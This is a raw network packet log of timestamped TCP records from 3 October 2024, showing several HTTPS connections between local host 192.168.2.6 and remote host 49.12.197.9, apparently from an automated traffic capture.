                                                                                                                                                      Oct 3, 2024 09:16:32.389436007 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.389482975 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.389517069 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.389527082 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.389566898 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.407296896 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.407319069 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.407461882 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.407499075 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.407547951 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.408560038 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.408576012 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.408668995 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.408680916 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.409642935 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.418373108 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.418448925 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.418518066 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.418530941 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.418559074 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.418570995 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.432562113 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.432610035 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.432765007 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.432782888 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.432832956 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.459337950 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.459412098 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.459489107 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.459530115 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.459543943 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.459572077 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.463116884 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.463169098 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.463223934 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.463233948 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.463258982 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.463275909 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.468700886 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.468751907 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.468806028 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.468815088 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.468839884 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.468862057 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.479692936 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.479716063 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.479938984 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.479973078 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.480031967 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.498740911 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.498795033 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.498892069 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.498903990 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.498924971 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.498961926 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.508407116 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.508465052 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.508555889 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.508584976 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.508611917 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.508622885 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.509624004 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.509673119 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.509852886 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.509866953 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.509913921 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.523245096 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.523293018 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.523418903 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.523453951 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.523503065 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.549721956 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.549776077 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.549922943 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.549969912 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.549993992 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.550014019 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.558691025 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.558743954 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.558832884 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.558870077 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.558885098 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.558911085 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.559920073 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.559961081 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.559994936 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.560009003 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.560036898 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.560054064 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.570640087 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.570697069 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.570763111 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.570796013 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.570815086 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.570837975 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.589001894 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.589067936 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.589296103 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.589346886 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.589399099 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.599133968 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.599194050 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.599297047 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.599335909 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.599354982 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.599378109 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.600372076 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.600392103 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.600466013 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.600486040 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.600528002 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.613928080 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.613995075 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.614084005 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.614123106 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.614140987 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.614165068 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.640409946 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.640436888 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.640542984 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.640571117 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.640614986 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.649483919 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.649504900 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.649621010 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.649648905 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.649692059 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.650368929 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.650387049 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.650453091 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.650464058 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.650502920 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.661489964 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.661513090 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.661613941 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.661644936 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.661700010 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.679554939 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.679586887 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.679831982 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.679845095 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.679899931 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.689748049 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.689778090 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.689934969 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.689966917 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.690015078 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.690933943 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.690954924 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.691097975 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.691103935 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.691153049 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.705020905 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.705049992 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.705200911 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.705219030 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.705271959 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.731103897 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.731136084 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.731425047 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.731456995 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.731508017 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.740753889 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.740784883 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.740886927 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.740921974 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.740972042 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.751562119 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.751593113 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.751698017 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.751727104 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.751770973 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.752820015 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.752855062 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.752912045 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.752918959 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.752966881 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.770396948 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.770447969 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.770556927 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.770591021 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.770636082 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.780294895 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.780323982 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.780390024 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.780421019 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.780471087 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.781606913 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.781631947 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.781712055 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.781722069 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.781766891 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.795600891 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.795640945 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.795723915 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.795758963 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.795814991 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.821754932 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.821830988 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.821938038 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.821969986 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.821973085 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.822025061 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.822355032 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.822387934 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:33.181354046 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:33.181411982 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:33.181485891 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:33.181756020 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:33.181770086 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:33.912199974 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:33.915637970 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:33.916207075 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:33.916220903 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:33.918098927 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:33.918104887 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:33.918121099 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:33.918128014 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:34.692547083 CEST49739443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:34.692598104 CEST4434973949.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:34.692675114 CEST49739443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:34.692928076 CEST49739443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:34.692941904 CEST4434973949.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:34.773046970 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:34.773119926 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:34.773134947 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:34.773180962 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:34.800308943 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:34.800352097 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:35.365787983 CEST4434973949.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:35.365919113 CEST49739443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:35.366415977 CEST49739443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:35.366435051 CEST4434973949.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:35.368555069 CEST49739443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:35.368576050 CEST4434973949.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:36.075668097 CEST4434973949.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:36.075740099 CEST4434973949.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:36.075757027 CEST49739443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:36.075786114 CEST4434973949.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:36.075800896 CEST49739443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:36.075829029 CEST49739443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:36.075834990 CEST4434973949.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:36.075867891 CEST49739443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:36.075905085 CEST4434973949.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:36.075943947 CEST49739443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:36.076139927 CEST49739443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:36.076154947 CEST4434973949.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:36.079010963 CEST49740443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:36.079056025 CEST4434974049.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:36.079139948 CEST49740443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:36.079426050 CEST49740443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:36.079448938 CEST4434974049.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:36.749439955 CEST4434974049.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:36.749670982 CEST49740443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:36.750334978 CEST49740443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:36.750346899 CEST4434974049.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:36.752243996 CEST49740443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:36.752253056 CEST4434974049.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:37.464330912 CEST4434974049.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:37.464375973 CEST4434974049.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:37.464490891 CEST4434974049.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:37.464503050 CEST49740443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:37.464569092 CEST49740443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:37.464948893 CEST49740443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:37.464967012 CEST4434974049.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:37.485052109 CEST49742443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:37.485097885 CEST4434974249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:37.485187054 CEST49742443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:37.485430002 CEST49742443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:37.485439062 CEST4434974249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:38.133575916 CEST4434974249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:38.133675098 CEST49742443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:38.134238958 CEST49742443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:38.134243965 CEST4434974249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:38.136101007 CEST49742443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:38.136107922 CEST4434974249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:38.810376883 CEST4434974249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:38.810457945 CEST49742443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:38.810477018 CEST4434974249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:38.810502052 CEST4434974249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:38.810518026 CEST49742443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:38.810551882 CEST49742443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:38.811512947 CEST49742443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:38.811537981 CEST4434974249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:39.541029930 CEST49743443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:39.541095018 CEST4434974349.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:39.541191101 CEST49743443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:39.541501045 CEST49743443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:39.541517019 CEST4434974349.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:40.196760893 CEST4434974349.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:40.196938038 CEST49743443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:40.197607994 CEST49743443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:40.197622061 CEST4434974349.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:40.199600935 CEST49743443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:40.199615955 CEST4434974349.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:40.199681997 CEST49743443192.168.2.649.12.197.9
